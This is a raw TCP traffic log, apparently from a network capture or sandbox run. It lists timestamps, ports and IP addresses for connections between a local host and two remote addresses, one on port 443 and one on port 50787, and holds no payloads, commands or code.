Jan 3, 2025 02:01:00.607049942 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.607606888 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.607810020 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.607903957 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.608289003 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.608530045 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.608985901 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.609266043 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.615879059 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.616079092 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.616182089 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.616621971 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.616852999 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.617310047 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.617635965 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.617994070 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.618220091 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.618443966 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.618781090 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.618927002 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.619086981 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.619492054 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.619770050 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.620212078 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.620407104 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.620529890 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.620987892 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.621227980 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.621699095 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.622047901 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.622401953 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.622687101 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.623097897 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.623338938 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.733175039 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.733474016 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.734568119 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.734865904 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.735672951 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.735840082 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.735985994 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.738075972 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.738219976 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.738219976 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.738318920 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.738809109 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.738982916 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.739135027 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.739550114 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.739814997 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.739867926 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.740246058 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.740492105 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.740537882 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.741028070 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.741215944 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.741288900 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.741740942 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.742012024 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.742453098 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.742820978 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.743149996 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.743468046 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.743974924 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.744143009 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.744276047 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.744688034 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.744822025 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.744896889 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.745361090 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.745481968 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.745481968 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.745579958 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.746371984 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.746562004 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.746746063 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.747927904 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.748163939 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.750842094 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.751061916 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.751755953 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.751884937 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.752047062 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.752629995 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.752896070 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.753297091 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.753612995 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.754013062 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.754220009 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.754805088 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.755018950 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.755187035 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.755518913 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.755857944 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.756228924 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.756509066 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.756926060 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.757131100 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.757726908 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.757898092 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.758040905 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.758419037 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.758577108 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.758677959 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.759183884 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.759377003 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.759443998 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.759954929 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.760111094 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.760215044 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.760699034 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.760905981 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.761392117 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.761567116 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.761683941 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.762073040 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.762217045 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.762281895 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.762892008 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.763170004 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.763580084 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.763878107 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.764298916 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.764561892 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.765106916 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.765294075 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.765501022 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.765816927 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.766048908 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.766572952 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.766880989 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.767254114 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.767546892 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.768050909 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.768311977 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.768750906 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.768933058 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.769052029 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.769423962 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.769575119 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.769669056 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.770263910 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.770443916 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.770575047 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.770950079 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.771131992 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.771301031 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.771647930 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.771836996 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.771930933 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.772350073 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.772516012 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.772562027 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.773179054 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.773399115 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.773874044 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.774072886 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.774398088 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.774440050 CET	443	49774	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:00.774576902 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.774749041 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:00.776844025 CET	49774	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:17.864803076 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:18.158945084 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:18.159091949 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:18.160676956 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:18.458643913 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:18.458856106 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:18.779284000 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:18.779298067 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:18.779534101 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:18.781625986 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:19.076541901 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:19.122232914 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:20.521192074 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:20.521219015 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:20.521475077 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:20.533003092 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:20.533015966 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:20.652621031 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:20.850891113 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:20.851134062 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:20.852848053 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:20.852860928 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:20.853120089 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:20.883169889 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:20.926260948 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:20.998703003 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:20.999106884 CET	49775	50787	192.168.11.20	193.187.91.218
Jan 3, 2025 02:01:21.163290024 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.163306952 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.163310051 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.163465023 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.163465023 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.163479090 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.163487911 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.215504885 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.318464994 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.318469048 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.318553925 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.318685055 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.318762064 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.319454908 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.319458961 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.319634914 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.319634914 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.320247889 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.320250988 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.320431948 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.320431948 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.320451975 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.358088970 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.358288050 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.358288050 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.358407021 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.370568991 CET	50787	49775	193.187.91.218	192.168.11.20
Jan 3, 2025 02:01:21.474841118 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.475079060 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.476006985 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.476187944 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.476243973 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.476243973 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.476710081 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.476888895 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.476888895 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.476944923 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.477443933 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.477576971 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.477711916 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.478112936 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.478293896 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.478354931 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.513866901 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.514049053 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.514060974 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.514060974 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.514723063 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.514962912 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.630278111 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.630480051 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.630846024 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.631345034 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.631871939 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.631871939 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.632045984 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.632236958 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.632236958 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.632339954 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.632759094 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.632977962 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.633483887 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.634206057 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.634206057 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.634270906 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.634499073 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.634617090 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.634953976 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.635215998 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.635663033 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.635852098 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.635852098 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.635910034 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.636477947 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.636791945 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.636791945 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.636791945 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.637185097 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.637367010 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.637553930 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.637902021 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.638097048 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.638128042 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.670047045 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.670187950 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.670262098 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.670262098 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.670790911 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.670919895 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.670991898 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.670991898 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.786627054 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.786849022 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.786849022 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.787213087 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.787492037 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.788149118 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.788427114 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.788832903 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.788983107 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.788983107 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.789081097 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.789510965 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.789673090 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.789673090 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.789741993 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.790198088 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.790359020 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.790437937 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.791028976 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.791256905 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.791732073 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.791924953 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.791924953 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.791975021 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.792428970 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.792623997 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.792690992 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.793298006 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.793454885 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.793454885 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.793582916 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.793955088 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.794158936 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.794158936 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.794682026 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.794872999 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.794872999 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.794929028 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.795443058 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.795634031 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.795751095 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.796174049 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.796370983 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.796370983 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.796386957 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.796905994 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.797096014 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.797096014 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.797144890 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.797661066 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.797866106 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.797982931 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.798278093 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.798471928 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.798471928 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.798573971 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.799093008 CET	443	49776	209.58.149.225	192.168.11.20
Jan 3, 2025 02:01:21.799292088 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.799292088 CET	49776	443	192.168.11.20	209.58.149.225
Jan 3, 2025 02:01:21.799338102 CET	49776	443	192.168.11.20	209.58.149.225
